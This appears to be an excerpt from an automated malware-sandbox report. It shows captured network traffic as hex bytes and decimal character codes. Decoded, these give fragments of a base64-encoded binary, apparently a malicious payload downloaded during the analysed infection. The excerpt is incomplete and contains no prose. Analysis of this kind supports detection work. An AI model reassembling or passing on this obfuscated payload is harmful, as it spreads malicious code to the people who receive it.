                    Data Ascii: 2 0 98 0 106 0 111 0 78 0 106 0 56 0 65 0 65 0 73 0 116 0 57 0 67 0 68 0 80 0 65 0 79 0 85 0 99 0 99 0 105 0 85 0 88 0 99 0 105 0 85 0 88 0 111 0 105 0 85 0 88 0 103 0 120 0 48 0 88 0 107 0 65 0 65 0 69 0 65 0 65 0 73 0 108 0 70 0 50 0 73 0 108 0 70 0 57
                    2021-10-26 16:59:46 UTC4533INData Raw: 20 34 33 20 30 20 31 30 35 20 30 20 38 37 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 34 37 20 30 20 38 39 20 30 20 35 33 20 30 20 39 39 20 30 20 31 32 30 20 30 20 31 32 30 20 30 20 34 33 20 30 20 37 30 20 30 20 35 32 20 30 20 31 31 38 20 30 20 37 39 20 30 20 31 30 35 20 30 20 35 36 20 30 20 38 30 20 30 20 31 31 31 20 30 20 38 34 20 30 20 31 30 36 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 37 20 30 20 37 36 20 30 20 31 32 30 20 30 20 34 33 20 30 20 31 30 35 20 30 20 31 30 37 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 32 20 30 20 31 30 36 20 30 20 31 31 36 20 30 20 31 32 32 20 30 20 37 32 20 30 20 37 32 20 30 20 31 32 32 20 30 20 31 31 32 20 30 20 37 37
                    Data Ascii: 43 0 105 0 87 0 80 0 103 0 65 0 65 0 77 0 47 0 89 0 53 0 99 0 120 0 120 0 43 0 70 0 52 0 118 0 79 0 105 0 56 0 80 0 111 0 84 0 106 0 56 0 65 0 65 0 70 0 67 0 76 0 120 0 43 0 105 0 107 0 80 0 103 0 65 0 65 0 82 0 106 0 116 0 122 0 72 0 72 0 122 0 112 0 77
                    2021-10-26 16:59:46 UTC4534INData Raw: 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 39 20 30 20 34 37 20 30 20 34 39 20 30 20 36 35 20 30 20 38 31 20 30 20 35 34 20 30 20 31 32 31 20 30 20 31 30 39 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 39 37 20 30 20 36 38 20 30 20 31 31 32 20 30 20 39 38 20 30 20 38 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 38 20 30 20 35 36 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 35 30 20 30 20 34 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 38 39 20 30 20 34 39 20 30 20 37 38 20 30 20 31 31 36 20 30 20 37 30 20 30 20 37 31 20 30 20 37 36 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 35 37 20 30 20 38 31 20 30 20 36 39 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 31 31 36 20 30 20
                    Data Ascii: 0 111 0 118 0 79 0 47 0 49 0 65 0 81 0 54 0 121 0 109 0 76 0 66 0 109 0 97 0 68 0 112 0 98 0 84 0 47 0 47 0 118 0 56 0 65 0 106 0 89 0 50 0 48 0 47 0 47 0 55 0 47 0 85 0 89 0 49 0 78 0 116 0 70 0 71 0 76 0 122 0 118 0 57 0 81 0 69 0 73 0 50 0 70 0 116 0
                    2021-10-26 16:59:46 UTC4538INData Raw: 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 37 33 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 35 20 30 20 38 39 20 30 20 31 32 30 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 36 20 30 20 35 35 20 30 20 34 37 20 30 20 38 35 20 30 20 36 35 20 30 20 38 33 20 30 20 37 36 20 30 20 36 36 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 34 37 20 30 20 37 37 20 30 20 38 34 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 38 37 20 30 20 31 30 36 20 30 20 37 37
                    Data Ascii: 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 47 0 73 0 84 0 65 0 65 0 65 0 85 0 87 0 105 0 89 0 120 0 48 0 65 0 65 0 105 0 56 0 55 0 47 0 85 0 65 0 83 0 76 0 66 0 109 0 111 0 65 0 106 0 89 0 47 0 77 0 84 0 65 0 65 0 65 0 85 0 87 0 106 0 77
                    2021-10-26 16:59:46 UTC4542INData Raw: 20 34 33 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 34 39 20 30 20 34 33 20 30 20 36 38 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 31 31 37 20 30 20 37 39 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 34 38 20 30 20 36 35 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 31 20 30 20 31 30 36 20 30 20 38 35 20 30 20 35 31 20 30 20 35 36 20 30 20 38 35 20 30 20 38 39 20 30 20 34 39 20 30 20 37 37 20 30 20 38 30 20 30 20 31 31 39 20 30 20 37 34 20 30 20 38 32 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 36 39 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 37 30 20 30 20 38 30 20 30 20 35 36 20 30 20 38 36 20 30 20 31 31 36
                    Data Ascii: 43 0 106 0 107 0 65 0 65 0 73 0 116 0 49 0 43 0 68 0 118 0 122 0 117 0 79 0 106 0 69 0 81 0 65 0 66 0 48 0 65 0 111 0 118 0 71 0 106 0 85 0 51 0 56 0 85 0 89 0 49 0 77 0 80 0 119 0 74 0 82 0 85 0 80 0 57 0 49 0 69 0 80 0 57 0 49 0 70 0 80 0 56 0 86 0 116
                    2021-10-26 16:59:46 UTC4543INData Raw: 38 20 30 20 39 39 20 30 20 31 32 32 20 30 20 35 37 20 30 20 31 31 38 20 30 20 35 36 20 30 20 38 36 20 30 20 31 31 30 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 36 20 30 20 34 33 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 38 20 30 20 31 30 34 20 30 20 39 38 20 30 20 35 35 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 37 20 30 20 38 35 20 30 20 37 31 20 30 20 39 37 20 30 20 37 34 20 30 20 31 31 36 20 30 20 39 38 20 30 20 31 32 32 20 30 20 35 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 37 34 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20
                    Data Ascii: 8 0 99 0 122 0 57 0 118 0 56 0 86 0 110 0 77 0 66 0 65 0 65 0 71 0 106 0 43 0 65 0 81 0 65 0 65 0 105 0 47 0 105 0 78 0 104 0 98 0 55 0 57 0 47 0 47 0 57 0 87 0 85 0 71 0 97 0 74 0 116 0 98 0 122 0 57 0 47 0 47 0 47 0 111 0 118 0 74 0 85 0 65 0 65 0 71 0
                    2021-10-26 16:59:46 UTC4547INData Raw: 33 20 30 20 38 30 20 30 20 34 37 20 30 20 38 31 20 30 20 35 34 20 30 20 31 31 39 20 30 20 37 33 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 36 38 20 30 20 31 31 38 20 30 20 36 38 20 30 20 31 30 30 20 30 20 36 39 20 30 20 31 30 35 20 30 20 37 36 20 30 20 38 32 20 30 20 38 31 20 30 20 31 32 31 20 30 20 37 34 20 30 20 38 32 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 34 37 20 30 20 36 35 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 30 20 30 20 36 37 20 30 20 36 38 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 31 30 30 20 30 20 36 36 20 30 20 37 31 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 32 30 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37 30 20 30 20 31 31 33 20
                    Data Ascii: 3 0 80 0 47 0 81 0 54 0 119 0 73 0 122 0 119 0 68 0 118 0 68 0 100 0 69 0 105 0 76 0 82 0 81 0 121 0 74 0 82 0 81 0 106 0 111 0 47 0 65 0 107 0 65 0 65 0 73 0 116 0 50 0 67 0 68 0 118 0 122 0 100 0 66 0 71 0 78 0 82 0 102 0 120 0 81 0 97 0 103 0 70 0 113
                    2021-10-26 16:59:46 UTC4551INData Raw: 20 30 20 31 31 31 20 30 20 36 38 20 30 20 31 30 32 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 35 32 20 30 20 31 30 38 20 30 20 37 30 20 30 20 34 33 20 30 20 36 38 20 30 20 31 31 38 20 30 20 36 38 20 30 20 35 34 20 30 20 31 32 31 20 30 20 31 31 37 20 30 20 36 38 20 30 20 34 33 20 30 20 38 31 20 30 20 31 30 38 20 30 20 34 39 20 30 20 39 37 20 30 20 31 30 33 20 30 20 38 37 20 30 20 35 30 20 30 20 38 32 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 35 20 30 20 37 33 20 30 20 37 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 35 36 20 30 20 37 37 20 30 20 38 30 20 30 20 31 30 34 20 30 20 37 37 20 30 20 36 35 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37
                    Data Ascii: 0 111 0 68 0 102 0 51 0 47 0 47 0 52 0 108 0 70 0 43 0 68 0 118 0 68 0 54 0 121 0 117 0 68 0 43 0 81 0 108 0 49 0 97 0 103 0 87 0 50 0 82 0 103 0 65 0 65 0 85 0 79 0 105 0 73 0 79 0 65 0 65 0 65 0 79 0 56 0 77 0 80 0 104 0 77 0 65 0 66 0 65 0 65 0 67 0 7
                    2021-10-26 16:59:46 UTC4556INData Raw: 30 20 30 20 35 36 20 30 20 31 31 38 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 37 38 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 31 30 30 20 30 20 35 36 20 30 20 38 30 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 35 20 30 20 34 39 20 30 20 31 30 36 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 37 37 20 30 20 38 36 20 30 20 31 31 34 20 30 20 31 30 33 20 30 20 36 39 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 39 38 20 30 20 35 31 20 30 20 31 31 39 20 30 20 34 37 20 30 20 38 30 20 30 20 34 37 20 30 20 34
                    Data Ascii: 0 0 56 0 118 0 122 0 47 0 47 0 49 0 78 0 81 0 90 0 111 0 109 0 100 0 56 0 80 0 122 0 47 0 47 0 43 0 105 0 49 0 106 0 103 0 65 0 65 0 105 0 51 0 85 0 77 0 103 0 56 0 81 0 77 0 86 0 114 0 103 0 69 0 65 0 81 0 65 0 65 0 106 0 98 0 51 0 119 0 47 0 80 0 47 0 4
                    2021-10-26 16:59:46 UTC4560INData Raw: 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 38 32 20 30 20 38 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 37 39 20 30 20 37 38 20 30 20 39 38 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 39 20 30 20 37 35 20 30 20 37 38 20 30 20 31 30 34 20 30 20 38 31 20 30 20 36 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 31 20 30 20 35 34 20 30 20 36 38 20 30 20 31 30 31 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 34 20 30 20 31 30 34 20 30 20 38 36 20 30 20 31 30 36 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 37 20 30 20 38 33 20 30 20 37 38 20 30 20 38 32 20 30 20 38 39 20 30 20 31 30 34 20
                    Data Ascii: 5 0 68 0 111 0 82 0 83 0 48 0 65 0 65 0 73 0 79 0 78 0 98 0 80 0 47 0 47 0 47 0 119 0 75 0 78 0 104 0 81 0 68 0 47 0 47 0 47 0 57 0 81 0 54 0 68 0 101 0 77 0 65 0 65 0 67 0 74 0 104 0 86 0 106 0 47 0 47 0 47 0 43 0 68 0 120 0 67 0 83 0 78 0 82 0 89 0 104
                    2021-10-26 16:59:46 UTC4564INData Raw: 36 38 20 30 20 37 33 20 30 20 31 31 36 20 30 20 35 37 20 30 20 36 37 20 30 20 37 39 20 30 20 31 31 35 20 30 20 38 35 20 30 20 39 30 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 31 30 32 20 30 20 31 30 30 20 30 20 36 35 20 30 20 37 38 20 30 20 38 38 20 30 20 35 34 20 30 20 31 31 39 20 30 20 37 30 20 30 20 38 34 20 30 20 39 37 20 30 20 36 37 20 30 20 31 32 32 20 30 20 37 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 39 30 20 30 20 31 30 36 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30 20 31 30 34 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 36 20 30 20 36 35 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30
                    Data Ascii: 68 0 73 0 116 0 57 0 67 0 79 0 115 0 85 0 90 0 106 0 107 0 102 0 100 0 65 0 78 0 88 0 54 0 119 0 70 0 84 0 97 0 67 0 122 0 75 0 81 0 65 0 68 0 47 0 70 0 90 0 106 0 65 0 81 0 65 0 67 0 78 0 82 0 99 0 104 0 81 0 106 0 89 0 86 0 65 0 47 0 47 0 47 0 47 0 85 0
                    2021-10-26 16:59:46 UTC4568INData Raw: 31 20 30 20 39 39 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 36 38 20 30 20 31 31 31 20 30 20 37 30 20 30 20 36 37 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 30 20 30 20 36 39 20 30 20 37 30 20 30 20 37 39 20 30 20 31 31 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 35 31 20 30 20 34 38 20 30 20 37 37 20 30 20 39 37 20 30 20 37 39 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 36 38 20 30 20 31 32 31 20 30 20 38 30 20 30 20 34 37 20 30 20 31 31 31 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 35 33 20 30 20 39 38 20 30 20 38 38 20 30 20 34 39 20 30 20 35 31 20 30 20 36 37 20 30 20 36 37 20 30 20 36 35 20 30 20 36
                    Data Ascii: 1 0 99 0 81 0 97 0 103 0 68 0 111 0 70 0 67 0 69 0 65 0 65 0 73 0 80 0 69 0 70 0 79 0 115 0 81 0 105 0 51 0 48 0 77 0 97 0 79 0 106 0 69 0 81 0 65 0 67 0 68 0 121 0 80 0 47 0 111 0 100 0 121 0 115 0 65 0 65 0 70 0 53 0 98 0 88 0 49 0 51 0 67 0 67 0 65 0 6
                    2021-10-26 16:59:46 UTC4572INData Raw: 30 20 36 35 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 39 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 31 20 30 20 35 32 20 30 20 39 39 20 30 20 36 35 20 30 20 37 32 20 30 20 38 35 20 30 20 37 32 20 30 20 31 32 30 20 30 20 34 38 20 30 20 38 39 20 30 20 39 39 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 38 30 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 36 39 20 30 20 36 38 20 30 20 35 35 20 30 20 31 30 30 20 30 20 36 36 20 30 20 36 36 20 30 20 37 30 20 30 20 37 32 20 30 20 31 31 31 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 35 35 20
                    Data Ascii: 0 65 0 115 0 65 0 65 0 65 0 65 0 47 0 120 0 87 0 99 0 119 0 85 0 65 0 65 0 103 0 51 0 52 0 99 0 65 0 72 0 85 0 72 0 120 0 48 0 89 0 99 0 65 0 81 0 65 0 65 0 65 0 77 0 80 0 47 0 100 0 67 0 81 0 69 0 68 0 55 0 100 0 66 0 66 0 70 0 72 0 111 0 108 0 118 0 55
                    2021-10-26 16:59:46 UTC4575INData Raw: 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 39 30 20 30 20 36 38 20 30 20 35 34 20 30 20 35 37 20 30 20 37 38 20 30 20 37 30 20 30 20 36 35 20 30 20 34 33 20 30 20 31 31 38 20 30 20 38 38 20 30 20 38 32 20 30 20 31 31 39 20 30 20 36 38 20 30 20 38 37 20 30 20 31 30 34 20 30 20 36 37 20 30 20 37 36 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 38 32 20 30 20 31 31 33 20 30 20 36 36 20 30 20 36 37 20 30 20 31 31 38 20 30 20 31 30 31 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 38 39 20 30 20 36 38 20 30 20 35 34 20 30 20 35 37 20 30 20 37 30 20 30 20 36 39 20 30 20 36 35 20 30 20 34 33 20 30 20 31 31 38 20 30 20 38 38 20 30 20 38 32 20 30 20 31 30 33 20 30 20 36 38 20 30 20 38 37 20 30 20 31 30 33 20 30 20 31 31 39 20 30 20 36 38 20 30
                    Data Ascii: 0 85 0 52 0 118 0 90 0 68 0 54 0 57 0 78 0 70 0 65 0 43 0 118 0 88 0 82 0 119 0 68 0 87 0 104 0 67 0 76 0 101 0 103 0 82 0 113 0 66 0 67 0 118 0 101 0 85 0 52 0 118 0 89 0 68 0 54 0 57 0 70 0 69 0 65 0 43 0 118 0 88 0 82 0 103 0 68 0 87 0 103 0 119 0 68 0
                    2021-10-26 16:59:46 UTC4579INData Raw: 30 20 36 39 20 30 20 36 38 20 30 20 36 37 20 30 20 36 38 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 39 20 30 20 36 38 20 30 20 31 30 32 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 30 20 30 20 38 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 37 33 20 30 20 35 34 20 30 20 37 30 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 32 20 30 20 38 31 20 30 20 38 33 20 30 20 34 37 20 30 20 34 38 20 30 20 39 39 20 30 20 37 37 20 30 20 31 30 35 20 30 20 35 31 20 30 20 31 31 39 20 30 20 31 30 37 20 30 20 36 38 20 30 20 37 30 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 36 37
                    Data Ascii: 0 69 0 68 0 67 0 68 0 65 0 66 0 88 0 105 0 47 0 109 0 68 0 102 0 119 0 81 0 65 0 100 0 82 0 47 0 47 0 100 0 67 0 81 0 73 0 54 0 70 0 118 0 47 0 47 0 47 0 43 0 70 0 119 0 72 0 81 0 83 0 47 0 48 0 99 0 77 0 105 0 51 0 119 0 107 0 68 0 70 0 67 0 76 0 82 0 67
                    2021-10-26 16:59:46 UTC4583INData Raw: 20 36 37 20 30 20 31 30 38 20 30 20 31 30 37 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 33 20 30 20 34 39 20 30 20 35 37 20 30 20 35 30 20 30 20 38 30 20 30 20 37 39 20 30 20 31 31 34 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 35 20 30 20 38 31 20 30 20 31 30 35 20 30 20 34 38 20 30 20 34 38 20 30 20 38 35 20 30 20 31 30 35 20 30 20 38 35 20 30 20 38 38 20 30 20 38 35 20 30 20 37 37 20 30 20 35 36 20 30 20 36 37 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 30 20 30 20 31 30 35 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 30 20 30 20 31 32 31 20 30 20 37 34 20 30 20 38 32 20 30 20 31 30 32 20 30 20 38 33 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 30 20 30 20 38 32 20 30 20 38 31 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20
                    Data Ascii: 67 0 108 0 107 0 122 0 119 0 73 0 49 0 57 0 50 0 80 0 79 0 114 0 105 0 48 0 85 0 81 0 105 0 48 0 48 0 85 0 105 0 85 0 88 0 85 0 77 0 56 0 67 0 74 0 82 0 100 0 105 0 74 0 82 0 100 0 121 0 74 0 82 0 102 0 83 0 78 0 82 0 100 0 82 0 81 0 47 0 51 0 85 0 77 0
                    2021-10-26 16:59:46 UTC4588INData Raw: 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 38 30 20 30 20 37 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 34 38 20 30 20 35 35 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 34 20 30 20 37 34 20 30 20 31 30 36 20 30 20 31 32 32 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 31 30 32 20 30 20 38 38 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 37 34 20 30 20 31 31 39 20 30 20 31 30 33 20 30 20 38 31 20 30 20 36 35 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 31 30 31 20 30 20 31 31 39 20 30 20 38 39 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 31 32 32 20 30 20
                    Data Ascii: 0 47 0 47 0 43 0 103 0 80 0 77 0 103 0 65 0 65 0 106 0 89 0 85 0 48 0 55 0 118 0 47 0 47 0 54 0 74 0 106 0 122 0 47 0 47 0 57 0 102 0 88 0 108 0 118 0 74 0 119 0 103 0 81 0 65 0 86 0 89 0 118 0 115 0 103 0 101 0 119 0 89 0 67 0 65 0 65 0 65 0 85 0 122 0
                    2021-10-26 16:59:46 UTC4592INData Raw: 35 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 34 39 20 30 20 31 31 38 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 38 31 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 35 37 20 30 20 34 39 20 30 20 38 30 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 31 30 33 20 30 20 37 37 20 30 20 31 30 31 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 31 20 30 20 37 37 20 30 20 39 37 20 30 20 38 30 20 30 20 35 32 20 30 20 37 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 30 20 30 20 39 38 20 30 20 34 39 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20 30 20 38 35 20 30 20 37
                    Data Ascii: 5 0 73 0 50 0 70 0 49 0 118 0 51 0 47 0 47 0 49 0 100 0 81 0 90 0 111 0 109 0 57 0 49 0 80 0 51 0 47 0 47 0 43 0 103 0 77 0 101 0 103 0 65 0 65 0 103 0 56 0 81 0 77 0 97 0 80 0 52 0 72 0 65 0 65 0 67 0 78 0 104 0 100 0 98 0 49 0 47 0 47 0 57 0 88 0 85 0 7
                    2021-10-26 16:59:46 UTC4596INData Raw: 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 32 32 20 30 20 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 34 39 20 30 20 34 37 20 30 20 37 36 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 35 37 20 30 20 31 30 31 20 30 20 38 37 20 30 20 35 32 20 30 20 31 31 38 20 30 20 31 30 38 20 30 20 38 38 20 30 20 39 39 20 30 20 37 33 20 30 20 37 37 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 38 20 30 20 37 34 20 30 20 36 35 20 30 20 38 34 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 32 20 30 20 31 30 36 20 30 20 36 36 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 37 20 30 20 31 30 33 20 30 20 38 30 20 30 20 39 38 20 30 20 38 39 20 30 20 37 31 20 30 20 35 36 20 30 20 36 38 20 30 20
                    Data Ascii: 0 47 0 100 0 81 0 122 0 47 0 100 0 81 0 106 0 111 0 49 0 47 0 76 0 47 0 47 0 49 0 57 0 101 0 87 0 52 0 118 0 108 0 88 0 99 0 73 0 77 0 65 0 80 0 57 0 48 0 74 0 65 0 84 0 47 0 70 0 102 0 106 0 66 0 81 0 65 0 65 0 107 0 103 0 80 0 98 0 89 0 71 0 56 0 68 0
                    2021-10-26 16:59:46 UTC4600INData Raw: 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 34 39 20 30 20 34 39 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 32 32 20 30 20 38 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 39 39 20 30 20 36 39 20 30 20 37 34 20 30 20 37 39 20 30 20 31 31 31 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 34 37 20 30 20 31 30 30 20 30 20 31 30 34 20 30 20 36 38 20 30 20 34 37 20 30 20 34 39 20 30 20 34 39 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 31 37 20 30 20 35 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 39 39 20 30 20 36 39 20 30 20 37 34 20 30 20 38 30 20 30 20 36 39 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30
                    Data Ascii: 0 65 0 68 0 47 0 100 0 104 0 68 0 47 0 49 0 49 0 68 0 111 0 122 0 88 0 65 0 65 0 65 0 77 0 99 0 69 0 74 0 79 0 111 0 68 0 65 0 65 0 68 0 47 0 100 0 104 0 68 0 47 0 49 0 49 0 68 0 111 0 117 0 51 0 65 0 65 0 65 0 77 0 99 0 69 0 74 0 80 0 69 0 68 0 65 0 65 0
                    2021-10-26 16:59:46 UTC4604INData Raw: 30 20 35 32 20 30 20 36 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 31 32 30 20 30 20 31 31 37 20 30 20 31 30 34 20 30 20 31 32 30 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 35 32 20 30 20 38 39 20 30 20 31 31 31 20 30 20 38 37 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 34 37 20 30 20 31 30 33 20 30 20 37 30 20 30 20 38 38 20 30 20 35 31 20 30 20 38 31 20 30 20 37 34 20 30 20 31 30 33 20 30 20 34 37 20 30 20 31 30 33 20 30 20 37 31 20 30 20 31 30 30 20 30 20 36 35 20 30 20 38 31 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 39 20 30 20 31 31 35 20 30 20 36 38 20 30 20 37 37 20 30 20 35 36 20 30 20 36 36 20 30 20 36 35 20 30 20 38 35 20 30 20 37 31 20
